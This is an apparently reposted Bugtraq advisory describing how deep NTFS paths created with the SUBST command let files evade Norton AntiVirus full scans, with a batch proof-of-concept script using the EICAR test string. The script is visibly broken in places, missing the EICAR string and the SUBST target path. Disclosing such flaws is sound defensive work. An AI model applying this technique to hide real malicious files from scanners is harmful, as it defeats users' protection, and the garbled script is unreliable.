This was posted to bugtraq by Hans Somers on Jan 30th:


Long path exploit on NTFS
The filesystem NTFS seems to be a hiding place for virusses if you use a file path which exceeds 256 charaters.

What is the case?
The filepath (drive + folderpath + filename) theoraticly can take up to 32000 charaters if the filesystem in use is NTFS. However, the way in wich Windows NT (4.0, 2000 and XP) access this filesystem a maximum of 256 characters is in place. If you try to go deeper, you will experience a "Path too long" error. In these Operating System there is a way to substitute a long folderpath, using the "SUBST" command. If you change your current drive to the substituted drive, the pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
Normally this would not alarm anyone, however, i discovered that my favorite virusscanner (Norton AntiVirus) was not able to follow the deep path where i created the EICAR-test string. So i created a very simple batchfile to demonstrate this exploit. My virusscanner will only find this virus is the SUBST drive is availible during the scan.

I have tested this on the following platforms:
Windows NT 4.0 SP4
Windows NT 4.0 SP6a
Windows 2000 Professional SP2
Windows XP Pro
I have determined that the following versions of Norton AntiVirus will not follow the deep path during a complete scan:
Norton AntiVirus 5.0
Norton AntiVirus 7.5.1
Norton Antivirus 8.00.58

I suspect that other virusscanners will encounter the same "bug" so you
might try the sample script that i created. Additionally, other tools (quotamanagers,
inventory tools etc) that gather information from a NTFS partition might reveal the same

After running the script below, remove the substituted drive (SUBST Q: /D) and run a full scan on your C-partition. I suspect that the Eicar-virus will not be found.
Additionally, re-create the substituted drive and re-run the scan. Under normal conditions
the Eicar-virus will be found and removed (depending on your settings).

As far as i can see, there is no real remedy against this exploit. I hope this message will pass through the proper channels, so the responsible parties will act on this.

Responses on this posting at my address are welcome.

Hans Somers (

Sample script:
@echo off
echo Start test-script NTFS-limit
@echo Create a filepath to the limit of NTFS
md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
@echo Create the Eicar test-string for PoC. This should be detected
normally if you
have an active virusscanner.
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
@echo Create a subst-drive Q: for this path
subst Q:
@echo Create e even deeper filepath (thus exceeding the limit of NTFS's
md Q:\1234567890\1234567890\1234567890
@echo Change current folder into "the deep"
cd Q:\1234567890\1234567890\1234567890
@echo Create the Eicar test-string
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
echo .
echo End of test-script

===END POST===

I'd like to reiterate that these are not my findings, I'm merely passing the information on to these forums.